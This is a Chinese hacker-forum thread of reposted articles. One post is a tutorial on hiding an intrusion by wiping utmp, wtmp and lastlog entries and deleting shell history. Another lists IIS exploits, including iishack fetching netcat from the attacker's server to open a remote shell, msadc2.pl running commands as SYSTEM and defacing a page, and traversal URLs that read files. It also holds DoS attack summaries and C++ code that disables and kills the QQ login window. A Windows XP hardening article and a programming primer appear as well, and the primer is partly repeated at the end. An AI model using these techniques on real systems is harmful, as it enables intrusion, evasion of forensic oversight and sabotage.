* Cleaning messages.1 ( 28 lines)...0 lines removed!

* Cleaning messages.2 ( 38 lines)...0 lines removed!

* Cleaning messages.3 ( 17 lines)...0 lines removed!

* Cleaning spellhist ( 0 lines)...0 lines removed!

* Cleaning sulog ( 986 lines)...6 lines removed!

* Cleaning utmp ( 179 lines)...1 lines removed!

* Cleaning utmpx ( 387 lines)...1 lines removed!

* Cleaning vold.log ( 0 lines)...0 lines removed!

* Cleaning wtmp ( 299 lines)...0 lines removed!

* Cleaning wtmpx ( 565 lines)...0 lines removed!

* Cleaning authlog ( 0 lines)...0 lines removed!

* Cleaning syslog ( 53 lines)...0 lines removed!

* Cleaning syslog.0 ( 14 lines)...0 lines removed!

* Cleaning syslog.1 ( 64 lines)...0 lines removed!

* Cleaning syslog.2 ( 39 lines)...0 lines removed!

* Cleaning syslog.3 ( 5 lines)...0 lines removed!

* Cleaning syslog.4 ( 3 lines)...0 lines removed!

* Cleaning syslog.5 ( 210 lines)...0 lines removed!

#



这个用/bin/sh的脚本有一个问题,

就是必须你要有uid =0 的权限.即root.

euid = 0 会不能正常工作,报告权限不够.

解决方法是:

大家可以改里面的#!/usr/sh 为你设置好的suid shell.:)



这个脚本有一个好处,就是不用编译,并且可以在多个系统下面工作.如redhat sunos等等.

还可以用

cat > clog.sh

来方便的拷贝到主机.不用ftp 去取.:)

还有一个命令可以清除大部分的日志.

这也是我常用它的原因.

但它做的太干净了,把以前的记录也删除了.:(

有时候也会不太干净.比如lastlog.utmp可能有时会清除不了.

所以,现在我一般结合两个工具来清除日志.



好的一般放在后面介绍.:)

下面介绍一个我觉得比较好的另一个日志清除器.:)

在HUCkit.zip里的wipe-1.00.tgz.

他完全可以清除

lastlog

utmp

utmpx

wtmp

wtmpx



:)

下面我们来看看.(示范工作平台sunos 5.7)



# gzip -d wipe-1.00.tgz

# tar -xf wipe-1.00.tar

# cd wipe-1.00

# ls -al

总数32

drwxr-xr-x  2  root  root     512   2月 4 20:48   .

drwxrwxrwx  6  root  other    1024   2月 4 18:40   ..

-rw-r--r--  1  root  root     130   1997 1月 9   INSTALL

-rw-r--r--  1  root  staff    1389   1997 1月 9   Makefile

-rw-r--r--  1  root  root     498   1997 1月 9   README

-rw-r--r--  1  root  staff   10027   1997 1月 9   wipe.c

# make



Wipe v0.01 !



Usage: 'make ' where System types are:



  linux freebsd sunos4 solaris2 ultrix

  aix irix digital bsdi netbsd hpux



#



我们可以看到它需要出示 系统的选项.这些选项是:

  linux freebsd sunos4 solaris2 ultrix

  aix irix digital bsdi netbsd hpux



我们要清除相关的系统日志就必须在相同的系统下编译.

比如我们要在redhat等linux下编译,就应为: make linux

在freebsd下编译就应为:make freebsd

在sunos 4下编译,就应为: make sunos4

在sunos 5以上的系统里编译,就应为:make solaris2



这里我们用make solaris2

sunos 5 以上就叫做solaris了.

# make solaris2

gcc -O3 -DHAVE_LASTLOG_H -DHAVE_UTMPX -o wipe wipe.c

# ls -al

总数94

drwxr-xr-x  2  root  root   512   2月 4 21:03   .

drwxrwxrwx  6  root  other  1024   2月 4 18:40   ..

-rw-r--r--  1  root  root   130   1997 1月 9   INSTALL

-rw-r--r--  1  root  staff  1389   1997 1月 9   Makefile

-rw-r--r--  1  root  root    498   1997 1月 9   README

-rwxr-xr-x  1  root  other  30920   2月 4 21:03  wipe

-rw-r--r--  1  root  staff  10027   1997 1月 9   wipe.c

#./wipe



USAGE: wipe [ u|w|l|a ] ...options...



UTMP editing: Erase all usernames : wipe u [username]

  Erase one username on tty: wipe u [username] [tty]



WTMP editing: Erase last entry for user : wipe w [username]

  Erase last entry on tty : wipe w [username] [tty] LASTLOG



editing: Blank lastlog for user : wipe l [username] Alter lastlog

  entry : wipe l [username] [tty] [time] [host]

  Where [time] is in the format [YYMMddhhmm]



ACCT editing: Erase acct entries on tty : wipe a [username] [tty]





大家可以看到编译好的wipe的使用方法.

其中 u 选项为 utmp utmpx 日志擦除..

w 选项为 wtmp wtmpx 日志擦除.

l 选项为 lastlog 日志擦除.

a 为/var/adm/pacct日志擦除.(一般不用这个.:)



其中[tty]为终端号.为在有多个相同帐号同时登陆时,清除日志的使用选项.当然是要你的终端号哦.:)

大家可以用 w 命令查终端号.

比如:

# w

下午 9:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名   终端号   登入时间   闲置   JCPU   PCPU   执行命令

gao    pts/1   下午 7:40        3          w



下面的是我在sunos 5.7上的具体的使用情况.:)



# w

下午 9:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名   终端号   登入时间   闲置   JCPU   PCPU   执行命令

gao    pts/1   下午 7:40        3          w



# ./wipe u gao

Patching /var/adm/utmp .... Done.

Patching /var/adm/utmpx .... Done.



# w

下午 9:15 1 user, 平均负荷: 0.00, 0.00, 0.01

用户名   终端号   登入时间   闲置   JCPU   PCPU   执行命令



# ./wipe w gao

Patching /var/adm/wtmp .... Done.

Patching /var/adm/wtmpx .... Done.

# ./wipe l gao

Patching /var/adm/lastlog .... Done.



好了.

lastlog utmp utmpx wtmp wtmpx 擦完了.

大家看到 wipe u gao 了吗?

为什么我打了个w命令呢?

呵呵

想想.

所以我们一般在登陆进系统后就运行 wipe u gao.来隐藏自己.:)



当然我们不要忘了shell 记录哦.

# ls -al /.*history

-rw------- 1 root other 456 2月 4 20:27 .sh_history

# rm -f .*history

# cd

# pwd

/home/gao

# ls -al /.*history

-rw------- 1 root other 456 2月 4 20:27 .sh_history

# rm -f .*history





ok, 一个脚本加一个程序.再加一个操作,能保证你基本安全了.:)

当然如果你对系统有进一步了解,就能发现.这样清除还是有问题的.:)

好了.不说了.



最后放上我常去的几个网站.

1.

securityfocus
http://www.securityfocus.com

2.

packet storm
http://packetstorm.securify.com

3.
www.hack.co.za
http://www.hack.co.za/

4.

lsd-pl.net
http://www.lsd-pl.net/

5.

securiteam
http://www.securiteam.com/


B22层 发表时间: 11/10 20:26

回复: mingming8 [mingming8]   论坛用户   登录
7种DoS攻击方法简述
发布: 艰苦 日期: 10-30 类别: 新手上路 今日/总浏览: 22/4994 

Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这 些队列,造成了资源的大量消耗而不能向正常请求提供服务。

Smurf:该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求)的包,并且将源地址伪装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包,使该主机受到攻击。

Land-based:攻击者将一个包的源地址和目的地址都设置为目标主机的地址,然后将该包通过IP欺骗的方式发送给被攻击主机,这种包可以造成被攻击主机因试图与自己建立连接而陷入死循环,从而很大程度地降低了系统性能。

Ping of Death:根据TCP/IP的规范,一个包的长度最大为65536字节。尽管一个包的长度不能超过65536字节,但是一个包分成的多个片段的叠加却能做到。当一个主机收到了长度大于65536字节的包时,就是受到了Ping of Death攻击,该攻击会造成主机的宕机。

Teardrop:IP数据包在网络传递时,数据包可以分成更小的片段。攻击者可以通过发送两段(或者更多)数据包来实现TearDrop攻击。第一个包的偏移量为0,长度为N,第二个包的偏移量小于N。为了合并这些数据段,TCP/IP堆栈会分配超乎寻常的巨大资源,从而造成系统资源的缺乏甚至机器的重新启动。

PingSweep:使用ICMP Echo轮询多个主机。

Pingflood: 该攻击在短时间内向目的主机发送大量ping包,造成网络堵塞或主机资源耗尽。


B23层 发表时间: 11/10 20:27

回复: mingming8 [mingming8]   论坛用户   登录
IIS的十七个常见漏洞
1. iis4hack缓冲溢出

主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求
没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序
在系统中下载和执行程序。

要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面
的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。

你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应
的目录下,然后使用iishack.exe来检查目标机器:
c:\>iishack.exe <victim> 80 <your web server>/ncx.exe
然后你就使用netcat来连接你要检测的服务器:
c:\>nc <victim> 80
如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。

利用程序见iis4hack.zip

2.msadc

IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行
你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下,
它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,
其一般默认情况下是SYSTEM用户。

利用程序为msadc2.pl,我们看看它的help
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\host\share\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>

Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -h www.targe.com
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c

如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm

3.Codebrws.asp

察看文件源代码 http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代码 http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代码 http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允许一个WEB用户在
文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过
变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序
来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递
给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他
脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目


B24层 发表时间: 11/10 20:28

回复: mingming8 [mingming8]   论坛用户   登录
Windows XP安全不安全
发布: 劲风 日期: 10-23 类别: 新手上路 今日/总浏览: 10/1539 

           Windows XP安全不安全
  微软曾在某媒体上夸耀地说:“用Windows XP的用户将不再需要为网络访问安全担心”, 可见Windows XP为NT内核型的操作系统,其功能比任何一个Windows 系统都强,但也出现不少令人担忧的问题。
  下面,我们来看看 Windows XP 的利与弊,先看它的优越之处:

一、完善的用户管理功能

  1、用户管理非常安全
  Window XP采用Windows 2000/NT的内核,在用户管理上非常安全。凡是增加的用户都可以在登陆的时候看到,如图1,不像Windows 2000那样,被黑客增加了一个管理员组的用户都发现不了。使用NTFS文件系统可以通过设置文件夹的安全选项来限制用户对文件夹的访问,如某普通用户访问另一个用户的文档时会提出警告,如图2。你还可以对某个文件(或者文件夹)启用审核功能,将用户对该文件(或者文件夹)的访问情况记录到安全日志文件里去,进一步加强对文件操作的监督;另外,用户的密码管理也非常安全,Windows XP的密码保存在sam文件里。即使用lc这样的专业破解NT口令的软件,如果是破解六位以上的不规则密码可能需要几天的暴力破解时间哩。

图1
图2

二、透明的软件限制策略

  在Windows XP中,软件限制策略以“透明”的方式来隔离和使用不可靠的、潜在着对用户数据有危害的代码,这可以保护你的计算机免受各种通过电子邮件或网页传播的病毒、木马程序和蠕虫等,保证了数据的安全。

三、支持NTFS文件系统以及加密文件系统(EFS)

Windows XP里的加密文件系统 (EFS)基于公众密钥,并利用CryptoAPI 结构默认的EFS设置,EFS还可以使用扩展的Data Encryption Standard (DESX)和 Triple-DES (3DES) 作为加密算法 ,而这一切都是依赖NTFS文件系统来完成。用户可以轻松地加密文件。
加密时,EFS自动生成一个加密密钥。当你加密一个文件夹时,文件夹内的所有文件和子文件夹都被自动加密了,你的数据就会更加安全。

四、安全的网络访问特性

总的来说,新的特性表现在以下几个方面:
  1、补丁自动更新,微软为用户“减负”
  使用Windows XP 轻松多了,有了“自动更新”功能,自动连网帮你查看有没有新的补丁或者其它什么可以更新的东西,这样,您不必再费时间去下载补丁了。

  2、系统自带Internet连接防火墙
  Windows XP 自带了Internet防火墙,支持LAN、 VPN、拨号连接等等。支持“自定义设置”以及“日志察看”,为系统的安全起了一道“黑客防线”。

  3、消除了安全隐患
  在以前的版本中,Windows 系统都留着几个“后门”,如137、138、139等端口都是“敞开大门”的,现在,在Windows XP 中这些端口是关闭的,少了几个安全隐患。

  4、浏览器采用新版的IE6.0,为用户降低受Web攻击的可能性
  在Windows XP 里捆绑了最新的IE6.0 ,并且默认的安全设置较之以前的版本,有了进一步的提高。一般的用户都可以用得放心。

   Windows XP随着使用时间的增加,逐渐暴露了许多漏洞,下面,笔者根据有关资料,谈谈Windows XP 安全性的几个弊端。

一、Windows XP UPnP服务导致的几个漏洞
  UPnP 是“Universal Plug and Play”的缩写,是一种允许主机定位和使用局域网上设备的服务,存在着以下三个漏洞:缓冲区溢出、DOS攻击和DDOS 攻击。产生缓冲区溢出主要原因是UPnP存在缓冲区溢出问题,当处理部分超长的IP地址、端口和文件名时,就会发生缓冲区溢出。其结果是允许入侵者执行任何的指令,即获得SYSTEM权限!而产生DOS和DDOS攻击则是通过使系统的CPU使用率高达100%,令系统无法提供正常服务来达到攻击的目的。

  解决方法:
①到微软的网站下载补丁(需要提醒的是,不单是Windows XP 有该漏洞,如果是通过Windows XP的Internet连接共享客户端来安装UPnP的话,Windows98/ME 同样受到伤害)。微软已经发布了补丁:
Microsoft Windows 98/98SE: http://www.microsoft.com/Downloads/...ReleaseID=34991
Microsoft Windows ME: http://download.microsoft.com/downl.../314757USAM.EXE
Microsoft Windows XP: http://www.microsoft.com/Downloads/...ReleaseID=34951

②设置防火墙,禁止网络外部数据包对1900端口的连接。
③如果没有打上补丁的话,只好关闭UPnP服务,方法:打开“控制面板”,依次单击“性能和维护”->“管理工具”图标,双击“服务”图标,打开“服务”窗口,如图3所示:
图3
双击右边的“Universal Plug and Play Device Host”服务,在弹出的“Universal Plug and Play Device Host属性”窗口中,选中“常规”标签,将“启动类型”改为“手动”,如图4所示。
图4
再点击“停止”,出现图5的对话框即可。
图5

二、Windows XP远程桌面明文帐户名传送漏洞

  概述:Windows XP提供了远程桌面功能,可是Windows XP远程桌面存在设计缺陷,当连接建立的时候,Windows XP远程桌面把帐户名以明文形式发送给客户端。发送的帐户名不一定是远端主机的用户帐号,也可以是最常被客户端使用的帐户名,这很容易被网络上的嗅探程序捕获,危害系统的安全。

  解决方法:目前暂无(请随时关注产商信息http://www.microsoft.com/windowsxp/default.asp ),应停止远程桌面的使用,方法:右键单击“我的电脑”,选择“属性”,在弹出的窗口中,选“远程”标签,勾掉“允许用户远程连接到这台计算机”复选框前的钩,点“确定”即可,如图6所示。
图6

三、Windows XP快速帐号切换功能造成帐号锁定漏洞

  Windows XP快速帐号切换功能(如图7所示)设计存在问题,用户可以利用帐号快速切换功能,快速地重试登录一个用户名,系统认为有暴力猜解攻击,从而造成全部非管理员帐号的锁定,从而其他用户没有管理员的解禁不能登录主机。
解决方法:目前暂无,应禁止帐户快速切换功能,方法:在“控制面板”中单击“用户帐户”,再单击“更改用户登录或注销的方式”,清除“使用快速用户切换”复选框,单击“应用选项”即可,如图8所示。
图8
这样就不会出现“快速用户切换功能”了,如图9所示。
图9
  人非圣贤,孰能无过?跟以前的Windows系统相比,Windows XP无疑是最好的!


声明:
本文已经发表在《中国电脑教育报》(有改动),转载请注明版权,谢谢合作!

发布者: 劲风
来源: www.cngale.com







文章版权归原作者所有, 未经允许请勿转载, 如有任何问题请联系我们. 


Copyright ? 2000-2003 HUC All Rights Reserved.

中国红客网络技术联盟 www.cnhonker.com
webmaster@cnhonker.net


B25层 发表时间: 11/10 20:29

回复: mingming8 [mingming8]   论坛用户   登录
Windows黑客编程基础(上)
发布: 劲风 日期: 10-23 类别: 新手上路 今日/总浏览: 87/8123 

          Windows黑客编程基础(上)
  上面的题目带有“黑客”两个字,请大家别误会了,其实没有多少是讲黑客的,这完全是一篇菜鸟级的编程杂谈,如果您已是高手,就不必在此浪费时间了 。
  前几天在网上看了“病毒”兄写的《WIN下编程须知》一文,觉得在编程方面要写出一篇适合初学者们看的入门级文章的确很重要,可惜病毒兄只在该文里介绍了线程、消息、句柄等几个基本概念。很多初学者看了对编程还是感到很迷惑,一个从来没有写过程序的人如何入门?如何在短时间内写出自己的程序来?笔者带着这些问题写了这篇文章。这也是笔者在学习编程的初期所遇到的困惑,在此根据笔者的个人理解将其整理成文,希望能引起广大菜鸟们的共鸣,对初学者们有所帮助。
  从理论上说,任何一门语言都可以在任何一个系统上编程,只要找到该系统提供的“接口”和对系统内部机制有深入的了解就可以了,至少我是这么认为的。正如c语言可以在windows下编程,也同样可以在Linux上大放异彩一样。
  编程是一项很繁杂的工作,除了应用编程工具之外,了解系统本身内部工作机理非常重要,这是你写出稳定兼容的程序所必不可少的前提条件。你要在哪一种系统上编程就要对该系统的机制进行研究,至少你应该知道一个程序在那个系统上是如何运行的。
  一、了解Windows 内部机制
  Windows 是一个“基于事件的,消息驱动的”操作系统。
  在Windows下执行一个程序,只要用户进行了影响窗口的动作(如改变窗口大小或移动、单击鼠标等)该动作就会触发一个相应的“事件”。系统每次检测到一个事件时,就会给程序发送一个“消息”,从而使程序可以处理该事件。每个Windows 应用程序都是基于事件和消息的,而且包含一个主事件循环,它不停地、反复地检测是否有用户事件发生。每次检测到一个用户事件,程序就对该事件做出响应,处理完再等待下一个事件的发生。
  Windows 下的应用程序不断地重复这一过程,直至用户终止程序,用代码来描述实际上也就是一个消息处理过程的while循环语句。
  下面便简单介绍一下与 Windows 系统密切相关的几个基本概念:

  ⒈窗口:这是我要说的第一个概念。似乎是地球人都知道的事儿了,窗口是Windows本身以及Windows 环境下的应用程序的基本界面单位,但是很多人都误以为只有具有标题栏、状态栏、最大化、最小化按钮这样标准的方框才叫窗口。其实窗口的概念很广,例如按钮和对话框等也是窗口哦,只不过是一种特殊的窗口罢了。
  从用户的角度看,窗口就是显示在屏幕上的一个矩形区域,其外观独立于应用程序,事实上它就是生成该窗口的应用程序与用户间的直观接口;从应用程序的角度看,窗口是受其控制的一部分矩形屏幕区。应用程序生成并控制与窗口有关的一切内容,包括窗口的大小、风格、位置以及窗口内显示的内容等。用户打开一个应用程序后,程序将创建一个窗口,并在那里默默地等待用户的要求。每当用户选择窗口中的选项,程序即对此做出响应。

  ⒉程序:通常说的程序都是指一个能让计算机识别的文件,接触得最多的便是.exe型的可执行文件,这个不难理解。

  ⒊进程:说到进程,学过《操作系统》的人都很清楚,所谓进程就是应用程序的执行实例(或称一个执行程序)。需要注意的是:进程是程序动态的描述,而上面说到的程序是静态的描述,两者有本质的区别。举个例子,从网上Down了一个瑞星杀毒软件到C盘但没有运行,那个.exe 可执行文件叫做程序,它是一个二进制码的文件。一旦双击了exe文件图标运行程序,那个“正在运行着的瑞星杀毒”便称为进程,它在双击的那一刻被系统创建,当你关机或者在任务栏的图标上单击鼠标右键选“退出”时,进程便消亡,彻底结束了生命。进程经历了由“创建”到“消亡”的生命期,而程序自始至终存在于你的硬盘上,不管你的机器是否启动。

  ⒋线程:线程是进程中的一个执行单元,同一个进程中的各个线程对应于一组CPU指令、一组CPU寄存器以及一堆栈。进程本来就具有动态的含义,然而实质上是通过线程来执行体现的,从这个意义上说,Windows 中进程的动态性意义已经不是很明显了,只算是给程序所占的资源划定一个范围而已(个人观点,纯属个人理解,不必引起争议!),真正具有动态性意义的是线程。以前在大二学习操作系统课的时候就有个同学跟笔者提起这点,笔者还跟他驳得面红耳赤呢!现在想想,觉得很有道理,不得不佩服那位同学对Windows内部机制了解得如此清楚。
  之所以在此花那么多的篇幅说线程,是因为下面将要介绍到多线程编程技巧,如果不理解这点,那就很难应用到实践上,希望大家明白。

  ⒌消息:我们几乎做每一个动作都会产生一个消息,在用鼠标指点江山的今天,鼠标被移动会产生WM_MOUSEMOVE消息,鼠标左键被按下会产生WM_LBUTTONDOWN的消息,鼠标右键按下便产生WM_RBUTTONDOWN消息等等。所有的这些都可以通过GetMessage,SendMessage等函数得到,以后的操作中我们会经常接触到这些函数。

  ⒍事件:何谓事件?从它的字面意思我们就可以明白它的含义,如在程序运行的过程中改变窗口的大小或者移动窗口等,都会触发相应的“事件”。

  ⒎句柄:单单一个“柄”字便可以解释它的意思了,我们天气热摇扇子的时候只要抓住扇柄便可以控制整个扇子的运动了,在程序中也差不多是这个意思。通常一个句柄就可以传递我们所要做的事情。有经验的读者肯定清楚,编写程序总是要和各种句柄打交道的,句柄是系统用来标识不同对象类型的工具,如窗口、菜单等,这些东西在系统中被视为不同类型的对象,用不同的句柄将他们区分开来。
  看看C++ 教材中是如何给句柄下定义的:“在Win32里,句柄是指向一个无值型对象(void *)的指针,是一个4字节长的数据”。虽然我对它的本质是什么还是很迷惑,但我知道句柄并不是一个真正意义上的指针。从结构上看,句柄的确是一个指针,尽管它没有指向用于存储某个对象的内存位置(很多书都这么说,这正是我的迷惑所在),而实际上句柄指向的是一个包含了对该对象进行的引用的位置。在编程时,只要抓住了对象的句柄就可以对该对象进行操作了(我在《一个简单木马程序的编写与伪装策略》中说到的对QQ密码的截获就是要找到QQ登陆窗口的句柄后才开始截密行动的)。下面再举个例子来说明句柄的运用:编一个程序,使QQ登陆窗口的号码框和密码框均变黑,相关代码及解释:
void __fastcall TForm1::FormCreate(TObject *Sender)
{
HWND hCurWindow,HC,HE;//定义三个窗口句柄变量,hCurWindow用于存放QQ用户登陆窗口的句柄,HC、HE分别存放号码框和密码框的句柄。
if((hCurWindow= FindWindow(NULL,"QQ用户登录"))!=0||(hCurWindow=FindWindow(NULL,"OICQ用户登录"))!=0)
{//很明显,调用FindWindow()函数去获得QQ登陆窗口的句柄
String str;
str.sprintf("0x%x",hCurWindow);
}
TCHAR wClassName[255];//类名变量
HC=GetWindow(hCurWindow, GW_CHILD);//得到号码框的句柄
HE=GetWindow(HC, GW_HWNDNEXT);//接着得到密码框的句柄
GetClassName(HE, wClassName, sizeof(wClassName));//得到类名
GetClassName(HC, wClassName, sizeof(wClassName));//得到类名
EnableWindow(HE,false);//使窗口失效
EnableWindow(HC,false);//使窗口失效
}
  以上代码在C++ Builder下编译通过,只要运行次程序,QQ登陆窗口的号码框和密码框马上变黑色,如图1所示,无非是EnableWindow()函数所起的作用。

图1
  你还可以添加一个Timer控件,将上面的代码copy到void __fastcall TForm1::Timer1Timer(TObject *Sender)函数中,并在后边加上这一句代码:
SendMessage(hCurWindow,WM_CLOSE,0,0); 使QQ一启动就关闭,让别人永远也用不了QQ,挺有趣儿的哦&#61514;,(请参考光盘内的程序一)

  ⒏API与SDK:API是英文 Application Programming Interface 的简称,意为“应用程序接口”,泛指系统为应用程序提供的一系列接口函数。其实质是程序内的一套函数调用,在编程的时候可以直接调用,而不必知道其内部实现的过程,只知道它的原型和返回值就可以了,此外,手头经常放着一本“Windows API大全”之类的书也是必不可少的,不然你根本不知道哪些API是干什么用的,瞎编也编不出什么东西来。在后面我们会介绍调用API编程的例子,调用API编程工作虽然烦琐,但由于API函数都被封装在dll库里,程序只有在运行的时候才调用的,因此程序的体积小而且运行效率高。
  SDK是英文 Software Development Kit 的缩写,指“软件开发工具包”,在防火墙的设计中就经常涉及到SDK。
  有关基本的概念就谈这些,那些C/C++的基本语法、什么是面向对象等知识请大家查阅相关的书,此类书籍各大书店已汗牛充栋,不再多叙。下面直接谈谈语种和编程工具的选择问题,这也是初学者们最迷惑的问题。

  二、编程语言以及工具的选择:
  从上面的介绍我们对Windows 有了进一步的了解,现在就该开始行动了,选择要学的语言和工具是第一步,而且是非常重要的一步工作,笔者建议一切以简单、易接受为原则,不然你会自信心大减的,何必偏要跟自己过不去自讨苦吃呢?
  在开始的时候很多人都感到迷惑,目前的编程语言那么多,有c、c++、c#、java、汇编、html等等,究竟学哪些好呢?最开始我该学什么呢?甚至有人将vc、c++ builder也列为两种不同的语言!这些都是对编程语言缺乏了解造成的。笔者开始的时候也犯过同样的错误,曾经给自己写过一份计划书:先学c语言,接着学c++、c#、java、汇编、vb、vc、c++ builder……,哪一种语言用多少时间去专攻等等,现在回想起来觉得多么的可笑!只要学得精,一门就够了。从实用的角度来讲,C++ 是最好的选择(个人意见,其实每一种语言都很好),而VC和C++ Builder是其相应开发工具的两大主流,笔者极力推荐初学者使用C++ Builder,因为很容易上手,如果一下子就用VC的话,也许会打击你的自信心:)。
  三、谈谈促进编程能力提高的两个途径
  如果你是一个黑客技术的狂热者的话,到雅虎去搜索黑客教程的时候就会发现,很多的中文教程在谈到如何进行黑客编程时,十有八九都会介绍以下两大最佳途径:一、读程序;二、写程序,并且都提出了教程作者的看法,下面我想谈谈这方面的个人观点。
  ⒈读程序:我将读程序放在前面是有原因的。在你没有阅读过一份完整的源代码之前,你别指望能写出有多好的程序来!这是对每一位初学者的忠告也是警告,而且必须具备一定的语言基础知识,这里的基础知识主要是指语法知识,最起码要能读懂别人的程序的每一行意思。有没有程序的设计思想,在这个时期并不重要,只要具备一定的语法基础就可以了,思想可以通过阅读完别人的源程序后分析得来。
  记得在大一学习C语言的时候,我们都很重视语法的学习,整天都看教材、做练习,而且赶在老师的讲课前预习,课后又复习巩固,将一些语法点记得滚瓜烂熟,可后来一到做课程设计的时候,坐在电脑面前简直是老鼠拖鸡蛋―无从下手了,而且不断的问自己:“我平时的努力哪去了?语法都会了呀,怎么还是做不出程序来?”相信很多人都像笔者以前那样,错误地以为学会了语法就等于掌握了编程。
编程的能力包括经验、技巧、耐心等几个因素,而并非想象中的那样简单,更不要以为编程就是简简单单的写程序!
  其实学一门语言并不需要刻意去记那些条条框框的语法,在看代码的时候,遇到了不明白的地方再去查相关的资料,一点一点补充基础知识再配合源程序的思路,这时的理解才是最深刻的,我可以肯定地说,这个时候对语法的接受程度绝对比你刚开始时的死记要强!
  读程序也不能单纯地读,要真正做到“俯而读,昂而思”。好的代码是百读不厌的,比如Shotgun的那道构造洪水Ping攻击的代码,我至少读了20遍。笔者喜欢将从网上搜集来的代码打印到纸上(尽管学校的打印费贵得要命,打一份代码就得花去十几块甚至几十块大洋~~~),然后边看边做好眉批,遇到一个新函数记下它的功能,一些忘记了的知识在旁边标出来,还可以写上对程序的看法等等。特别是遇到了一些新的API函数,最好标出来,对你以后编程的时候也许会用得着,最后别忘了分析一下程序的思路,这样对你以后编写类似的程序很有帮助的。

  ⒉写程序:问题可谈到点子上了,学那么多语言,读那么多程序最终还不是为了写程序,做出适合需要的软件来?“君子性非异也,善加于物也”,笔者认为一切从借鉴开始,先是修改别人的程序,等到有了一定的程度再写出属于自己的程序。
  刚开始写程序,不要奢望一下子写出很出色的程序来,“万丈高楼平底起”,编程贵在动手,只要你动手去写了,就算只有一句“printf(“Hello!”);”也是一次进步!此外,还要依照自身的能力循序渐进地写,开始的时候写一点功能简单的、篇幅短小的代码,力求简洁、完整,“麻雀虽小,但五脏俱全”,然后在此基础上进行扩充,一点一点添加功能,下面笔者摘录一位国内一流编程高手、“豪杰超级解霸”的作者梁肇新的编程心得,请大家看看一个成功的程序员是如何写程序的,希望对广大菜鸟有所启发:
  写程序的方法:在Win98的环境中,先写主干,用最少的代码实现最基本的功能。然后一点点添加功能,每加一点都要调试。尽量少用动态分配、全局变量。充分利用操作系统直接提供的API。在Win98下调试通过之后,再在Win95下调试通过,然后是Win97,WindowsME,WinNT4.0。这样才能写出稳定、快速的程序。
  给程序员的建议:1、不要急于求成,这样往往欲速不达。2、不要什么东西都想学,什么都没掌握。3、每天都要自我总结,分析自己的错误率和废码率,不断加强自我管理。4、代码格式很重要。代码要规范、严谨,效率要高。5、不要盲从简单的开发工具(这点笔者不是很同意,最起码要有一定的功底的人才敢这么说)。6、有了成果要公开,不要舍不得,不然很快会过时的(以上两段摘自《程序员》增值合订本2001.上册P18,请读者前往参考)。

参考书籍:
《Windows C 程序设计》,清华大学出版社
《超级解霸梁肇新》,《程序员》合订本
声明:本文为劲风原创文章,来源 www.cngale.com,并已在《黑客防线》增刊上发表,转载请注明出处。


B26层 发表时间: 11/10 20:30

回复: mingming8 [mingming8]   论坛用户   登录
Windows黑客编程基础(上)
发布: 劲风 日期: 10-23 类别: 新手上路 今日/总浏览: 87/8123 

          Windows黑客编程基础(上)
  上面的题目带有“黑客”两个字,请大家别误会了,其实没有多少是讲黑客的,这完全是一篇菜鸟级的编程杂谈,如果您已是高手,就不必在此浪费时间了 。
  前几天在网上看了“病毒”兄写的《WIN下编程须知》一文,觉得在编程方面要写出一篇适合初学者们看的入门级文章的确很重要,可惜病毒兄只在该文里介绍了线程、消息、句柄等几个基本概念。很多初学者看了对编程还是感到很迷惑,一个从来没有写过程序的人如何入门?如何在短时间内写出自己的程序来?笔者带着这些问题写了这篇文章。这也是笔者在学习编程的初期所遇到的困惑,在此根据笔者的个人理解将其整理成文,希望能引起广大菜鸟们的共鸣,对初学者们有所帮助。
  从理论上说,任何一门语言都可以在任何一个系统上编程,只要找到该系统提供的“接口”和对系统内部机制有深入的了解就可以了,至少我是这么认为的。正如c语言可以在windows下编程,也同样可以在Linux上大放异彩一样。
  编程是一项很繁杂的工作,除了应用编程工具之外,了解系统本身内部工作机理非常重要,这是你写出稳定兼容的程序所必不可少的前提条件。你要在哪一种系统上编程就要对该系统的机制进行研究,至少你应该知道一个程序在那个系统上是如何运行的。
  一、了解Windows 内部机制
  Windows 是一个“基于事件的,消息驱动的”操作系统。
